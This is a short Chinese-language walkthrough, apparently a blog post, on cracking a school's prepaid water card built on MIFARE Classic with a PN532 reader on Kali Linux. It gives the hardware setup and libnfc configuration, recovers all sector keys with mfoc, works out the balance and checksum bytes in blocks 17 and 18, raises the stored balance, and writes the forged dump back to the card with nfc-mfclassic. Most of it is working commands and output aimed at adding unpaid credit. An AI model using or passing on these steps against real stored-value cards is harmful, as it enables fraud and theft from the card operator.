Linux下pn532板子测试学校水卡

0x01买板子

最便宜的板子pn532，需要买usb转串口的设备，对于kali-rolling，好像是通杀的，无论是PL2303,ch34X,FT232RL(没测试，这个更高端应该没问题)，cp2102。

把排针（不是电子专业的，不懂学名）焊接到pn532上，用杜邦线将两个板子连接,hardware is ok.

0x02安装软件

需要安装libnfc，可到githu上下载，解压后

cd xxx
./configure
make
sudo make install

新建`/usr/local/etc/nfc/libnfc.conf

abc@kali:/usr/local/etc/nfc$ cat libnfc.conf
#allow_autoscan = true
device.connstring = "pn532_uart:/dev/ttyUSB0"

安装mfoc、mfcuk，好像要编译下，因kali自带，这里不再说明。

0x03开始

连接设备，开工，拿水卡试下

abc@kali:~$ nfc-list
nfc-list uses libnfc 1.7.1
NFC device: pn532_uart:/dev/ttyUSB0 opened
1 ISO14443A passive target(s) found:
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00  04
       UID (NFCID1): 71  3d  b3  1e
      SAK (SEL_RES): 08

可以识别, 安装正确.

解码

abc@kali:~/nfc$ mfoc -f key -O tmp.mfd
...
Auth with all sectors succeeded, dumping keys to a file!
...

搞定密码

0x04分析数据

这里的数据较为简单, bock17和18储存金额和校验位, 找到校验位的规律为循环出现, 因此, 基于原有数据, 如00 00对应5a 78, 金额加上1020, 得到10 20对应FC 03, 修改结束.

写入到原卡或者空白卡片

abc@kali:~/nfc$ nfc-mfclassic w b tmp.mfd tmp.mfd

0x05

测试, 拿到卡机上测试,发现无法读取, 回到04, 将校验位加减1,重新写入, 测试ok.

0x06

m1卡已经完全失去了安全性, 犯罪成本之低,,,,,,